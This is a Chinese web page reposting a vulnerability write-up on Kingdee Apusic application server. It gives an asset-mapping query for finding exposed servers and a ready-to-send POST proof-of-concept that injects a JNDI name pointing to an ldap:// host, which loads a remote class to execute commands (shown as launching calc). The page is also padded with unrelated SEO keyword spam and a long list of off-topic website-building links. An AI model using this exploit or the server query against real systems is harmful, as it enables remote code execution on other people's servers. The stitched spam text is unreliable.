当前位置: 首页 > news >正文

山西大川建设有限公司网站留学网站建设

山西大川建设有限公司网站,留学网站建设,网页设计与制作课件清华大学,高德地图看不了国外产品介绍 金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。 漏洞概述 由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类&a…

产品介绍

金蝶Apusic是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。

漏洞概述

由于金蝶Apusic应用服务器权限验证不当,使用较低JDK版本,导致攻击者可以向loadTree接口执行JNDI注入,远程加载恶意类,造成远程代码执行。

资产测绘

app.name=“Apusic 金蝶天燕 Server”

漏洞复现

在这里插入图片描述
测试POC:

POST /appmonitor/protect/jndi/loadTree HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 55jndiName=ldap://***.***.***.***/Basic/Command/calc

弹出计算器进行验证
在这里插入图片描述

修复建议

官方已发布漏洞补丁,请联系软件厂商进行修复。

http://www.yayakq.cn/news/959751/

相关文章:

  • 温州设计集团网站建设ps做好切片后怎么做网站
  • 网站权重传递时代网站管理系统怎么做网站
  • 做网站_没内容以就业为导向的高职计算机专业网站设计
  • wordpress网站移植陕西外贸英文网站建设
  • 公司网站开发完成后怎么办百度做公司网站
  • 广告网站制作报价wordpress themes.php
  • 哪些企业网站使用水墨风格零售商城
  • 网站建设经济可行性公众号怎么做链接
  • 网站开发相关书籍资料淄博网站推广那家好
  • 网站做浮动边框asp代码上海企业登记在线平台
  • 佳木斯建设网站网站 版式
  • 关键词是网站seo的核心工作wordpress建什么网站好
  • 财经网站直播系统建设营销型企业网站
  • 做h的游戏 迅雷下载网站网络口碑营销的成功案例
  • 秒收网站包装设计十大网站
  • 手机文章网站源码百度网盘下载慢
  • app网站下载免费中职网站建设教学计划
  • 无锡网站制作楚天软件做化工回收上什么网站
  • 成品ppt的网站免费观看网站建设协议合同范本
  • 博罗网站建设京东网上商城书店
  • 用rp怎么做网站导航菜单湖南中霸建设公司官网
  • 网站怎么能被百度收录网站界面用什么软件做
  • 网站留言板作用wordpress主题 问答
  • 微信建微网站建大型网站要多少钱
  • 南昌做网站建设哪家好wordpress 思源黑体
  • 网站托管服务 重庆专业的google推广公司
  • 好的h5网站模板第一站长网
  • 杭州手机网站营销网站建设软件下载
  • 泰州专业网站建设制作个人网站制作毕业设计选题重难点
  • 网站禁止访问界面设计风格